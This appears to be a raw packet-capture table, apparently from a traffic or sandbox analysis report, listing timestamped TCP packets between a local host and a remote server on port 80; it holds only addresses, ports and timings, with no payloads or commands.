Dec 13, 2024 01:37:32.632415056 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.632448912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.632462025 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.632534981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.632567883 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.632580996 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.632613897 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.635397911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635442019 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635477066 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635499954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.635509014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635528088 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.635544062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635556936 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.635579109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.635592937 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.636260986 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.636296034 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.636315107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.636339903 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.638534069 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638616085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638648987 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638664961 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.638683081 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638726950 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.638818026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638853073 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.638861895 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.638896942 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.639403105 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.639446974 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.639483929 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.639528036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.640620947 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.640676022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.646487951 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.647381067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.647422075 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.647455931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.647475958 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.647490025 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.647496939 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.647535086 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.648075104 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.648108959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.648168087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.649133921 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.651371002 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.652604103 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653611898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653642893 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653670073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.653676987 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653687954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.653736115 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653770924 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.653781891 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.653812885 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.654652119 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.654942036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.654983997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.655029058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.655394077 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.655431032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.655440092 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.655471087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.656841993 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.656876087 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.656893969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.656917095 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.657129049 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.657162905 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.657176018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.657737970 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.657917023 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.657972097 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.796678066 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.796699047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.796715975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.796786070 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.796819925 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.796962976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.798017979 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.798029900 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.798063040 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.798089027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.798818111 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.798830032 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.798870087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.799343109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.799355984 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.799396038 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.800156116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.800354958 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.800359011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.801213026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.801223993 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.801254034 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.801281929 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.802000999 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.802011967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.802048922 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.802977085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.802988052 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.803028107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.803559065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.803596973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.803700924 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.804410934 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.804451942 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.804625988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.805275917 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.805321932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.805342913 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.805378914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.806071043 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.806166887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.806209087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.807318926 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.807329893 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.807382107 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.808372974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.808383942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.808414936 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.808440924 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.808667898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.808705091 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.809432030 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.809468031 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.810808897 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.810821056 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.810832977 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.810844898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.810848951 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.810869932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.810889959 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.811391115 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.811402082 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.811443090 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.812565088 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.812577009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.812618971 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.812932014 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.812968969 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.813779116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.813788891 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.813824892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.813985109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.814775944 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.814786911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.814816952 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.814827919 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.816128016 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.816138029 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.816180944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.817194939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.817204952 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.817214012 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.817240000 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.817250967 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.818969011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.819003105 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.819025040 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.819036961 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.819048882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.819071054 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.819084883 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.819108009 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.819112062 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.819150925 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.820533037 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.820576906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.820600986 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.820641994 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.820713997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.820749998 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.820763111 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.820791006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.821607113 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.821657896 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.821674109 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.821713924 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.822624922 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.822659969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.822678089 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.822701931 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.823203087 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.823246956 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.823293924 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.824300051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.824332952 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.824346066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.824373007 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.824841976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.825155020 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.825200081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.825706959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.825932980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.825982094 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.826587915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.826630116 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.826679945 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.827354908 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.827435970 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.827477932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.827524900 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.827568054 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.829165936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.829199076 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.829211950 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.829294920 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.829318047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.829355955 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.829360962 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.829396963 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.830274105 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.830315113 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.830326080 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.830354929 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.831341028 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.831376076 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.831423998 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.831641912 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.831779003 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.831828117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.832571030 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.832614899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.838757992 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.838793039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.838859081 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.839114904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.839149952 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.839198112 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.840008974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.840044022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.840090036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.840888023 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.840936899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.844842911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.844873905 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.844922066 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.844945908 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.844960928 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.844965935 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.846492052 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.846525908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.846543074 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.846574068 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.846681118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.846715927 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.846762896 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.847558975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.848424911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.848475933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.848563910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.848618031 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.848663092 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.849360943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.849397898 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.849411011 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.849438906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.849926949 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.850954056 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.939009905 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.939074993 CET	80	49758	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.939151049 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.953665972 CET	49758	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.989303112 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.989336967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.989356041 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.989372969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.989391088 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.989499092 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.989535093 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.990382910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.990417957 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.990444899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.990457058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.991408110 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.991442919 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.991451025 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.991482973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.992542982 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.992577076 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.992592096 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.992611885 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.992621899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.992646933 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.992652893 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.992687941 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.993594885 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.993629932 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.993653059 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.993674040 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.995172977 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.995206118 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.995229006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.995249033 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.995356083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.995389938 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.995403051 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.995430946 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.996881008 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.996913910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.996932030 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.996948004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.996961117 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.996983051 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.997006893 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.997040033 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.997957945 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.997992039 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.998017073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.998040915 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.998606920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.998657942 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.998836040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.998893976 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.999383926 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.999433994 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.999438047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.999483109 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.001188993 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.001221895 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.001247883 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.001255035 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.001260996 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.001290083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.001302004 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.001331091 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.002285957 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.002321959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.002331972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.002367973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.003293991 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.003344059 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:33.003346920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:33.003390074 CET	49753	80	192.168.2.5	185.81.68.147
